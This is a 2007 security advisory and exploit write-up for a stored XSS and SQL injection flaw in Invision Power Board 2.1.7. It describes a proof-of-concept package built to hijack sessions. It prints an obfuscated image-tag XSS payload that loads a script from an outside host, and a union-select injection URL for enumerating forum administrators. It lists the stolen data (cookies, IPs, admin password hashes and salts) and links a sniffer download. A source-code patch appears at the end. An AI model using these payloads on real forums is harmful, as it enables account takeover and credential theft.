----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]

            INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
              Eugene Minaev underwater@itdefence.ru
        ___________________________________________________________________
      ____/  __ __ _______________________ _______  _______________    \  \   \
      / .\  /  /_// //              /        \       \/      __       \   /__/   /
      / /     /_//              /\        /       /      /         /     /___/
      \/        /              / /       /       /\     /         /         /
      /        /               \/       /       / /    /         /__       //\
      \       /    ____________/       /        \/    __________// /__    // /   
      /\\      \_______/        \________________/____/  2007    /_//_/   // //\
      \ \\                                                               // // /
      .\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
      . \_\\________[________________________________________]_________//_//_/ . .
     
    ----[ NITRO ... ]
    
    This vulnerability was already found before, but there was no available 
    public "figting" exploit for it. This POC consists of several parts - active xss generator, 
    JS-file, which will be caused at visiting page with xss, log viewer and special component,
    which will take necessary data from MySQL forum's tables in case if intercepted session
    belonged to the person with moderator privileges. 
    
    ----[ ANALYSIS ... ]
    
    XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for 
    future injetion on the forum board. As the reference it is necessary to specify the full way 
    up to ya.js file (in which you have already preliminary corrected way on your own). Most likely 
    it is necessary only to press the button. 
    
    [img]http://www.ya.ru/[snapback]  onerror=script=document.createElement(String.fromCharCode(115,99,114,
    105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
    head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
    style=visibility:hidden  =[/snapback].gif[/img]
    
    The injection can be executed only when there is available session of the user with access 
    in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval" 
    function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team:
    
    index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
    
    ----[ RECORD ... ]
    {
    
      ---IP ADDRESS  sniffed ip address
      ---REFERER    xssed theme
      ---COOKIES     xssed cookies of forum member
      ---USER ID    xssed user id of forum member
      ---ADMIN NAME  admin username
      ---ADMIN PASS  admin pass hash
      ---ADMIN SALT  admin hash salt
      
    }
    
    ----[ PATCH ... ]
    
    FILE 
      sources/classes/bbcode/class_bbcode_core.php
    FUNCTION
      regex_check_image
    LINE
      924
    REPLACE
      if ( preg_match( "/[?&;]/", $url) )
    ON
      if ( preg_match( "/[?&;\<\[]/", $url) ) 
      
      
    FILE
      sources/classes/bbcode/class_bbcode_core.php
    FUNCTION
      post_db_parse_bbcode
    LINE
      486
    REPLACE
      preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
    ON
      preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );

      if ( $row['bbcode_tag'] == 'snapback' )
      {  
        $match[2][$i] = intval( $match[2][$i] );
      }  
      
      
    
    www.underwater.itdefence.ru/isniff.rar

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]